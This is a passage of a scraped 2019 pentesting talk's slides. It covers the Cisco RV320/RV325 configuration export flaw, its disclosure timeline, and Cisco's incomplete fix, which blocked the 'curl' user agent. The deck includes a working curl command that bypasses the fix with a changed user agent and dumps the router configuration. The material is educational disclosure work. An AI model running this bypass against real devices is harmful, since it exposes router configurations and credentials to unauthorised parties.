SolutionsSolutions☐ Don't expose the web interface to the internet
Jonas Lieb, RedTeam Pentesting GmbH - "Pentesting" (5. Juli 2019) 23
![Page 50: Pentesting · 7/5/2019 · What is a pentest? controlled attack same methods as "evil" hackers stipulated scope Jonas Lieb, RedTeam Pentesting GmbH - "Pentesting" (5. Juli 2019)](https://reader033.fdocuments.us/reader033/viewer/2022042018/5e7631f947fe35383457f149/html5/thumbnails/50.jpg)
SolutionsSolutions☐ Don't expose the web interface to the internet☐ Require authorisation for the configuration export
Jonas Lieb, RedTeam Pentesting GmbH - "Pentesting" (5. Juli 2019) 23
![Page 51: Pentesting · 7/5/2019 · What is a pentest? controlled attack same methods as "evil" hackers stipulated scope Jonas Lieb, RedTeam Pentesting GmbH - "Pentesting" (5. Juli 2019)](https://reader033.fdocuments.us/reader033/viewer/2022042018/5e7631f947fe35383457f149/html5/thumbnails/51.jpg)
SolutionsSolutions☐ Don't expose the web interface to the internet☐ Require authorisation for the configuration export☐ Sanitize inputs to the certificate generator
Jonas Lieb, RedTeam Pentesting GmbH - "Pentesting" (5. Juli 2019) 23
![Page 52: Pentesting · 7/5/2019 · What is a pentest? controlled attack same methods as "evil" hackers stipulated scope Jonas Lieb, RedTeam Pentesting GmbH - "Pentesting" (5. Juli 2019)](https://reader033.fdocuments.us/reader033/viewer/2022042018/5e7631f947fe35383457f149/html5/thumbnails/52.jpg)
SolutionsSolutions☐ Don't expose the web interface to the internet☐ Require authorisation for the configuration export☐ Sanitize inputs to the certificate generator ☐ Network separation
Jonas Lieb, RedTeam Pentesting GmbH - "Pentesting" (5. Juli 2019) 23
![Page 53: Pentesting · 7/5/2019 · What is a pentest? controlled attack same methods as "evil" hackers stipulated scope Jonas Lieb, RedTeam Pentesting GmbH - "Pentesting" (5. Juli 2019)](https://reader033.fdocuments.us/reader033/viewer/2022042018/5e7631f947fe35383457f149/html5/thumbnails/53.jpg)
SolutionsSolutions☐ Don't expose the web interface to the internet☐ Require authorisation for the configuration export☐ Sanitize inputs to the certificate generator ☐ Network separation☐ Discard router
Jonas Lieb, RedTeam Pentesting GmbH - "Pentesting" (5. Juli 2019) 23
![Page 54: Pentesting · 7/5/2019 · What is a pentest? controlled attack same methods as "evil" hackers stipulated scope Jonas Lieb, RedTeam Pentesting GmbH - "Pentesting" (5. Juli 2019)](https://reader033.fdocuments.us/reader033/viewer/2022042018/5e7631f947fe35383457f149/html5/thumbnails/54.jpg)
Responsible Disclosure TimelineResponsible Disclosure Timeline19.09.2018 vulnerability identified
Jonas Lieb, RedTeam Pentesting GmbH - "Pentesting" (5. Juli 2019) 24
![Page 55: Pentesting · 7/5/2019 · What is a pentest? controlled attack same methods as "evil" hackers stipulated scope Jonas Lieb, RedTeam Pentesting GmbH - "Pentesting" (5. Juli 2019)](https://reader033.fdocuments.us/reader033/viewer/2022042018/5e7631f947fe35383457f149/html5/thumbnails/55.jpg)
Responsible Disclosure TimelineResponsible Disclosure Timeline19.09.2018 vulnerability identified
27.09.2018 customer approved disclosure
Jonas Lieb, RedTeam Pentesting GmbH - "Pentesting" (5. Juli 2019) 24
![Page 56: Pentesting · 7/5/2019 · What is a pentest? controlled attack same methods as "evil" hackers stipulated scope Jonas Lieb, RedTeam Pentesting GmbH - "Pentesting" (5. Juli 2019)](https://reader033.fdocuments.us/reader033/viewer/2022042018/5e7631f947fe35383457f149/html5/thumbnails/56.jpg)
Responsible Disclosure TimelineResponsible Disclosure Timeline19.09.2018 vulnerability identified
27.09.2018 customer approved disclosure
28.09.2018 Cisco notified, deadline: 90 days
Jonas Lieb, RedTeam Pentesting GmbH - "Pentesting" (5. Juli 2019) 24
![Page 57: Pentesting · 7/5/2019 · What is a pentest? controlled attack same methods as "evil" hackers stipulated scope Jonas Lieb, RedTeam Pentesting GmbH - "Pentesting" (5. Juli 2019)](https://reader033.fdocuments.us/reader033/viewer/2022042018/5e7631f947fe35383457f149/html5/thumbnails/57.jpg)
Responsible Disclosure TimelineResponsible Disclosure Timeline19.09.2018 vulnerability identified
27.09.2018 customer approved disclosure
28.09.2018 Cisco notified, deadline: 90 days
21.12.2019 Cisco requests postponed disclosure
Jonas Lieb, RedTeam Pentesting GmbH - "Pentesting" (5. Juli 2019) 24
![Page 58: Pentesting · 7/5/2019 · What is a pentest? controlled attack same methods as "evil" hackers stipulated scope Jonas Lieb, RedTeam Pentesting GmbH - "Pentesting" (5. Juli 2019)](https://reader033.fdocuments.us/reader033/viewer/2022042018/5e7631f947fe35383457f149/html5/thumbnails/58.jpg)
Responsible Disclosure TimelineResponsible Disclosure Timeline19.09.2018 vulnerability identified
27.09.2018 customer approved disclosure
28.09.2018 Cisco notified, deadline: 90 days
21.12.2019 Cisco requests postponed disclosure
09.01.2019 Original deadline
Jonas Lieb, RedTeam Pentesting GmbH - "Pentesting" (5. Juli 2019) 24
![Page 59: Pentesting · 7/5/2019 · What is a pentest? controlled attack same methods as "evil" hackers stipulated scope Jonas Lieb, RedTeam Pentesting GmbH - "Pentesting" (5. Juli 2019)](https://reader033.fdocuments.us/reader033/viewer/2022042018/5e7631f947fe35383457f149/html5/thumbnails/59.jpg)
Responsible Disclosure TimelineResponsible Disclosure Timeline19.09.2018 vulnerability identified
27.09.2018 customer approved disclosure
28.09.2018 Cisco notified, deadline: 90 days
21.12.2019 Cisco requests postponed disclosure
09.01.2019 Original deadline
22.01.2019 Cisco releases patch
Jonas Lieb, RedTeam Pentesting GmbH - "Pentesting" (5. Juli 2019) 24
![Page 60: Pentesting · 7/5/2019 · What is a pentest? controlled attack same methods as "evil" hackers stipulated scope Jonas Lieb, RedTeam Pentesting GmbH - "Pentesting" (5. Juli 2019)](https://reader033.fdocuments.us/reader033/viewer/2022042018/5e7631f947fe35383457f149/html5/thumbnails/60.jpg)
Responsible Disclosure TimelineResponsible Disclosure Timeline19.09.2018 vulnerability identified
27.09.2018 customer approved disclosure
28.09.2018 Cisco notified, deadline: 90 days
21.12.2019 Cisco requests postponed disclosure
09.01.2019 Original deadline
22.01.2019 Cisco releases patch
23.01.2019 Advisory publishedrt-sa-2018-002
Jonas Lieb, RedTeam Pentesting GmbH - "Pentesting" (5. Juli 2019) 24
![Page 61: Pentesting · 7/5/2019 · What is a pentest? controlled attack same methods as "evil" hackers stipulated scope Jonas Lieb, RedTeam Pentesting GmbH - "Pentesting" (5. Juli 2019)](https://reader033.fdocuments.us/reader033/viewer/2022042018/5e7631f947fe35383457f149/html5/thumbnails/61.jpg)
Responsible Disclosure TimelineResponsible Disclosure Timeline
https://www.redteam-pentesting.de/advisories/rt-sa-2018-002
19.09.2018 vulnerability identified
27.09.2018 customer approved disclosure
28.09.2018 Cisco notified, deadline: 90 days
21.12.2019 Cisco requests postponed disclosure
09.01.2019 Original deadline
22.01.2019 Cisco releases patch
23.01.2019 Advisory publishedrt-sa-2018-002
Jonas Lieb, RedTeam Pentesting GmbH - "Pentesting" (5. Juli 2019) 24
![Page 62: Pentesting · 7/5/2019 · What is a pentest? controlled attack same methods as "evil" hackers stipulated scope Jonas Lieb, RedTeam Pentesting GmbH - "Pentesting" (5. Juli 2019)](https://reader033.fdocuments.us/reader033/viewer/2022042018/5e7631f947fe35383457f149/html5/thumbnails/62.jpg)
badpackets.net, 26.01.2019: "Over 9,000 Cisco RV320/RV325 routers are vulnerable to CVE-2019-1653"
Jonas Lieb, RedTeam Pentesting GmbH - "Pentesting" (5. Juli 2019) 25
![Page 63: Pentesting · 7/5/2019 · What is a pentest? controlled attack same methods as "evil" hackers stipulated scope Jonas Lieb, RedTeam Pentesting GmbH - "Pentesting" (5. Juli 2019)](https://reader033.fdocuments.us/reader033/viewer/2022042018/5e7631f947fe35383457f149/html5/thumbnails/63.jpg)
blog.rapid7.com, 29.01.2019: "Cisco RV320/RV325 Router Unauthenticated Configuration Export Vulnerability (CVE-2019-1653): What You Need to Know"
Jonas Lieb, RedTeam Pentesting GmbH - "Pentesting" (5. Juli 2019) 26
![Page 64: Pentesting · 7/5/2019 · What is a pentest? controlled attack same methods as "evil" hackers stipulated scope Jonas Lieb, RedTeam Pentesting GmbH - "Pentesting" (5. Juli 2019)](https://reader033.fdocuments.us/reader033/viewer/2022042018/5e7631f947fe35383457f149/html5/thumbnails/64.jpg)
Bleepingcomputer, 27.01.2019: "Hackers Targeting Cisco RV320/RV325 Routers Using New Exploits"
Jonas Lieb, RedTeam Pentesting GmbH - "Pentesting" (5. Juli 2019) 27
![Page 65: Pentesting · 7/5/2019 · What is a pentest? controlled attack same methods as "evil" hackers stipulated scope Jonas Lieb, RedTeam Pentesting GmbH - "Pentesting" (5. Juli 2019)](https://reader033.fdocuments.us/reader033/viewer/2022042018/5e7631f947fe35383457f149/html5/thumbnails/65.jpg)
Github Repository "CiscoRV320Dump" of David Davidson (@0x27)
Jonas Lieb, RedTeam Pentesting GmbH - "Pentesting" (5. Juli 2019) 28
![Page 66: Pentesting · 7/5/2019 · What is a pentest? controlled attack same methods as "evil" hackers stipulated scope Jonas Lieb, RedTeam Pentesting GmbH - "Pentesting" (5. Juli 2019)](https://reader033.fdocuments.us/reader033/viewer/2022042018/5e7631f947fe35383457f149/html5/thumbnails/66.jpg)
Firmware Upgrade... v1.4.2.17 v1.4.2.20
Jonas Lieb, RedTeam Pentesting GmbH - "Pentesting" (5. Juli 2019) 29
![Page 67: Pentesting · 7/5/2019 · What is a pentest? controlled attack same methods as "evil" hackers stipulated scope Jonas Lieb, RedTeam Pentesting GmbH - "Pentesting" (5. Juli 2019)](https://reader033.fdocuments.us/reader033/viewer/2022042018/5e7631f947fe35383457f149/html5/thumbnails/67.jpg)
SolutionsSolutions
Jonas Lieb, RedTeam Pentesting GmbH - "Pentesting" (5. Juli 2019) 30
![Page 68: Pentesting · 7/5/2019 · What is a pentest? controlled attack same methods as "evil" hackers stipulated scope Jonas Lieb, RedTeam Pentesting GmbH - "Pentesting" (5. Juli 2019)](https://reader033.fdocuments.us/reader033/viewer/2022042018/5e7631f947fe35383457f149/html5/thumbnails/68.jpg)
SolutionsSolutions(☑) Don't expose the web interface to the internet
Jonas Lieb, RedTeam Pentesting GmbH - "Pentesting" (5. Juli 2019) 30
![Page 69: Pentesting · 7/5/2019 · What is a pentest? controlled attack same methods as "evil" hackers stipulated scope Jonas Lieb, RedTeam Pentesting GmbH - "Pentesting" (5. Juli 2019)](https://reader033.fdocuments.us/reader033/viewer/2022042018/5e7631f947fe35383457f149/html5/thumbnails/69.jpg)
SolutionsSolutions(☑) Don't expose the web interface to the internet☐ Require authorisation for the configuration export
Jonas Lieb, RedTeam Pentesting GmbH - "Pentesting" (5. Juli 2019) 30
![Page 70: Pentesting · 7/5/2019 · What is a pentest? controlled attack same methods as "evil" hackers stipulated scope Jonas Lieb, RedTeam Pentesting GmbH - "Pentesting" (5. Juli 2019)](https://reader033.fdocuments.us/reader033/viewer/2022042018/5e7631f947fe35383457f149/html5/thumbnails/70.jpg)
SolutionsSolutions(☑) Don't expose the web interface to the internet☐ Require authorisation for the configuration export☐ Sanitize inputs to the certificate generator*
Jonas Lieb, RedTeam Pentesting GmbH - "Pentesting" (5. Juli 2019) 30
![Page 71: Pentesting · 7/5/2019 · What is a pentest? controlled attack same methods as "evil" hackers stipulated scope Jonas Lieb, RedTeam Pentesting GmbH - "Pentesting" (5. Juli 2019)](https://reader033.fdocuments.us/reader033/viewer/2022042018/5e7631f947fe35383457f149/html5/thumbnails/71.jpg)
SolutionsSolutions(☑) Don't expose the web interface to the internet☐ Require authorisation for the configuration export☐ Sanitize inputs to the certificate generator* ☑ Block curl
Jonas Lieb, RedTeam Pentesting GmbH - "Pentesting" (5. Juli 2019) 30
![Page 72: Pentesting · 7/5/2019 · What is a pentest? controlled attack same methods as "evil" hackers stipulated scope Jonas Lieb, RedTeam Pentesting GmbH - "Pentesting" (5. Juli 2019)](https://reader033.fdocuments.us/reader033/viewer/2022042018/5e7631f947fe35383457f149/html5/thumbnails/72.jpg)
# Excerpt from web server configuration file /etc/nginx.conf location / { root html; index index.html index.htm; + if ($http_user_agent ~* "curl") { + return 403; + } }
[...]
Jonas Lieb, RedTeam Pentesting GmbH - "Pentesting" (5. Juli 2019) 31
![Page 73: Pentesting · 7/5/2019 · What is a pentest? controlled attack same methods as "evil" hackers stipulated scope Jonas Lieb, RedTeam Pentesting GmbH - "Pentesting" (5. Juli 2019)](https://reader033.fdocuments.us/reader033/viewer/2022042018/5e7631f947fe35383457f149/html5/thumbnails/73.jpg)
# Excerpt from web server configuration file /etc/nginx.conf location / { root html; index index.html index.htm; + if ($http_user_agent ~* "curl") { + return 403; + } }
[...]
Jonas Lieb, RedTeam Pentesting GmbH - "Pentesting" (5. Juli 2019) 31
![Page 74: Pentesting · 7/5/2019 · What is a pentest? controlled attack same methods as "evil" hackers stipulated scope Jonas Lieb, RedTeam Pentesting GmbH - "Pentesting" (5. Juli 2019)](https://reader033.fdocuments.us/reader033/viewer/2022042018/5e7631f947fe35383457f149/html5/thumbnails/74.jpg)
Original Exploit$ curl --insecure https://192.168.10.1/cgi-bin/config.exp <html> <head><title>403 Forbidden</title></head> <body bgcolor="white"> <center><h1>403 Forbidden</h1></center> <hr> <center>nginx/1.10.1</center> </body> </html>
Jonas Lieb, RedTeam Pentesting GmbH - "Pentesting" (5. Juli 2019) 32
![Page 75: Pentesting · 7/5/2019 · What is a pentest? controlled attack same methods as "evil" hackers stipulated scope Jonas Lieb, RedTeam Pentesting GmbH - "Pentesting" (5. Juli 2019)](https://reader033.fdocuments.us/reader033/viewer/2022042018/5e7631f947fe35383457f149/html5/thumbnails/75.jpg)
Original Exploit
New Exploit
$ curl --insecure https://192.168.10.1/cgi-bin/config.exp <html> <head><title>403 Forbidden</title></head> <body bgcolor="white"> <center><h1>403 Forbidden</h1></center> <hr> <center>nginx/1.10.1</center> </body> </html>
$ curl --insecure --user-agent kurl \ -X POST --data 'submitbkconfig=0' \ https://192.168.10.1/cgi-bin/config.exp ####sysconfig#### [VERSION] VERSION=73 MODEL=RV320 [...]
Jonas Lieb, RedTeam Pentesting GmbH - "Pentesting" (5. Juli 2019) 32
![Page 76: Pentesting · 7/5/2019 · What is a pentest? controlled attack same methods as "evil" hackers stipulated scope Jonas Lieb, RedTeam Pentesting GmbH - "Pentesting" (5. Juli 2019)](https://reader033.fdocuments.us/reader033/viewer/2022042018/5e7631f947fe35383457f149/html5/thumbnails/76.jpg)
Timeline (Part 2)Timeline (Part 2)22.01.2019 Cisco releases "patch"
Jonas Lieb, RedTeam Pentesting GmbH - "Pentesting" (5. Juli 2019) 33
![Page 77: Pentesting · 7/5/2019 · What is a pentest? controlled attack same methods as "evil" hackers stipulated scope Jonas Lieb, RedTeam Pentesting GmbH - "Pentesting" (5. Juli 2019)](https://reader033.fdocuments.us/reader033/viewer/2022042018/5e7631f947fe35383457f149/html5/thumbnails/77.jpg)
Timeline (Part 2)Timeline (Part 2)22.01.2019 Cisco releases "patch"
07.02.2019 Incomplete mitigation identified
Jonas Lieb, RedTeam Pentesting GmbH - "Pentesting" (5. Juli 2019) 33
![Page 78: Pentesting · 7/5/2019 · What is a pentest? controlled attack same methods as "evil" hackers stipulated scope Jonas Lieb, RedTeam Pentesting GmbH - "Pentesting" (5. Juli 2019)](https://reader033.fdocuments.us/reader033/viewer/2022042018/5e7631f947fe35383457f149/html5/thumbnails/78.jpg)
Timeline (Part 2)Timeline (Part 2)22.01.2019 Cisco releases "patch"
07.02.2019 Incomplete mitigation identified
08.02.2019 Cisco notified, deadline: 27.03.2019
Jonas Lieb, RedTeam Pentesting GmbH - "Pentesting" (5. Juli 2019) 33
![Page 79: Pentesting · 7/5/2019 · What is a pentest? controlled attack same methods as "evil" hackers stipulated scope Jonas Lieb, RedTeam Pentesting GmbH - "Pentesting" (5. Juli 2019)](https://reader033.fdocuments.us/reader033/viewer/2022042018/5e7631f947fe35383457f149/html5/thumbnails/79.jpg)
Timeline (Part 2)Timeline (Part 2)22.01.2019 Cisco releases "patch"
07.02.2019 Incomplete mitigation identified
08.02.2019 Cisco notified, deadline: 27.03.2019
25.03.2019 Cisco requests postponed disclosure
Jonas Lieb, RedTeam Pentesting GmbH - "Pentesting" (5. Juli 2019) 33
![Page 80: Pentesting · 7/5/2019 · What is a pentest? controlled attack same methods as "evil" hackers stipulated scope Jonas Lieb, RedTeam Pentesting GmbH - "Pentesting" (5. Juli 2019)](https://reader033.fdocuments.us/reader033/viewer/2022042018/5e7631f947fe35383457f149/html5/thumbnails/80.jpg)
Timeline (Part 2)Timeline (Part 2)22.01.2019 Cisco releases "patch"
07.02.2019 Incomplete mitigation identified
08.02.2019 Cisco notified, deadline: 27.03.2019
25.03.2019 Cisco requests postponed disclosure
25.03.2019 Postponement declined
Jonas Lieb, RedTeam Pentesting GmbH - "Pentesting" (5. Juli 2019) 33
![Page 81: Pentesting · 7/5/2019 · What is a pentest? controlled attack same methods as "evil" hackers stipulated scope Jonas Lieb, RedTeam Pentesting GmbH - "Pentesting" (5. Juli 2019)](https://reader033.fdocuments.us/reader033/viewer/2022042018/5e7631f947fe35383457f149/html5/thumbnails/81.jpg)
Timeline (Part 2)Timeline (Part 2)22.01.2019 Cisco releases "patch"
07.02.2019 Incomplete mitigation identified
08.02.2019 Cisco notified, deadline: 27.03.2019
25.03.2019 Cisco requests postponed disclosure
25.03.2019 Postponement declined
27.03.2019 Advisory publishedrt-sa-2019-003
Jonas Lieb, RedTeam Pentesting GmbH - "Pentesting" (5. Juli 2019) 33
![Page 82: Pentesting · 7/5/2019 · What is a pentest? controlled attack same methods as "evil" hackers stipulated scope Jonas Lieb, RedTeam Pentesting GmbH - "Pentesting" (5. Juli 2019)](https://reader033.fdocuments.us/reader033/viewer/2022042018/5e7631f947fe35383457f149/html5/thumbnails/82.jpg)
Timeline (Part 2)Timeline (Part 2)22.01.2019 Cisco releases "patch"
07.02.2019 Incomplete mitigation identified
08.02.2019 Cisco notified, deadline: 27.03.2019
25.03.2019 Cisco requests postponed disclosure
25.03.2019 Postponement declined
27.03.2019 Advisory publishedrt-sa-2019-003
04.04.2019 Cisco releases second patch
Jonas Lieb, RedTeam Pentesting GmbH - "Pentesting" (5. Juli 2019) 33
![Page 83: Pentesting · 7/5/2019 · What is a pentest? controlled attack same methods as "evil" hackers stipulated scope Jonas Lieb, RedTeam Pentesting GmbH - "Pentesting" (5. Juli 2019)](https://reader033.fdocuments.us/reader033/viewer/2022042018/5e7631f947fe35383457f149/html5/thumbnails/83.jpg)
Timeline (Part 2)Timeline (Part 2)
https://www.redteam-pentesting.de/advisories/rt-sa-2018-003
22.01.2019 Cisco releases "patch"
07.02.2019 Incomplete mitigation identified
08.02.2019 Cisco notified, deadline: 27.03.2019
25.03.2019 Cisco requests postponed disclosure
25.03.2019 Postponement declined
27.03.2019 Advisory publishedrt-sa-2019-003
04.04.2019 Cisco releases second patch
Jonas Lieb, RedTeam Pentesting GmbH - "Pentesting" (5. Juli 2019) 33
![Page 84: Pentesting · 7/5/2019 · What is a pentest? controlled attack same methods as "evil" hackers stipulated scope Jonas Lieb, RedTeam Pentesting GmbH - "Pentesting" (5. Juli 2019)](https://reader033.fdocuments.us/reader033/viewer/2022042018/5e7631f947fe35383457f149/html5/thumbnails/84.jpg)
Bleepingcomputer, 28.03.2019: "Cisco Botches Fix for RV320, RV325 Routers, Just Blocks 'curl' User Agent"
Jonas Lieb, RedTeam Pentesting GmbH - "Pentesting" (5. Juli 2019) 34
![Page 85: Pentesting · 7/5/2019 · What is a pentest? controlled attack same methods as "evil" hackers stipulated scope Jonas Lieb, RedTeam Pentesting GmbH - "Pentesting" (5. Juli 2019)](https://reader033.fdocuments.us/reader033/viewer/2022042018/5e7631f947fe35383457f149/html5/thumbnails/85.jpg)
Heise Security, 28.03.2019: "Updates: Cisco sichert sein Router- und Switch-System IOS ab"
Jonas Lieb, RedTeam Pentesting GmbH - "Pentesting" (5. Juli 2019) 35
![Page 86: Pentesting · 7/5/2019 · What is a pentest? controlled attack same methods as "evil" hackers stipulated scope Jonas Lieb, RedTeam Pentesting GmbH - "Pentesting" (5. Juli 2019)](https://reader033.fdocuments.us/reader033/viewer/2022042018/5e7631f947fe35383457f149/html5/thumbnails/86.jpg)
Tweet by @Tophness, 29.03.2019
Jonas Lieb, RedTeam Pentesting GmbH - "Pentesting" (5. Juli 2019) 36
![Page 87: Pentesting · 7/5/2019 · What is a pentest? controlled attack same methods as "evil" hackers stipulated scope Jonas Lieb, RedTeam Pentesting GmbH - "Pentesting" (5. Juli 2019)](https://reader033.fdocuments.us/reader033/viewer/2022042018/5e7631f947fe35383457f149/html5/thumbnails/87.jpg)
Pentest = legal, controlled attack
versatile and creative process
Pentests improve security of so�ware and hardware
Jonas Lieb, RedTeam Pentesting GmbH - "Pentesting" (5. Juli 2019) 37
![Page 88: Pentesting · 7/5/2019 · What is a pentest? controlled attack same methods as "evil" hackers stipulated scope Jonas Lieb, RedTeam Pentesting GmbH - "Pentesting" (5. Juli 2019)](https://reader033.fdocuments.us/reader033/viewer/2022042018/5e7631f947fe35383457f149/html5/thumbnails/88.jpg)
https://www.redteam-pentesting.de/[email protected]
@RedTeamPT
Jonas Lieb, RedTeam Pentesting GmbH - "Pentesting" (5. Juli 2019) 38
![Page 89: Pentesting · 7/5/2019 · What is a pentest? controlled attack same methods as "evil" hackers stipulated scope Jonas Lieb, RedTeam Pentesting GmbH - "Pentesting" (5. Juli 2019)](https://reader033.fdocuments.us/reader033/viewer/2022042018/5e7631f947fe35383457f149/html5/thumbnails/89.jpg)
Appendix: ToolsAppendix: Tools
Curl
Nmap (https://nmap.org/)
OWASP Zed Attack Proxy (ZAP) (https://www.zaproxy.org/)
Binwalk (https://github.com/ReFirmLabs/binwalk)
FirmwareModKit (https://github.com/rampageX/firmware-mod-kit/wiki)
Ghidra (https://ghidra-sre.org/)
Metasploit Framework (https://www.metasploit.com/)
Jonas Lieb, RedTeam Pentesting GmbH - "Pentesting" (5. Juli 2019) 39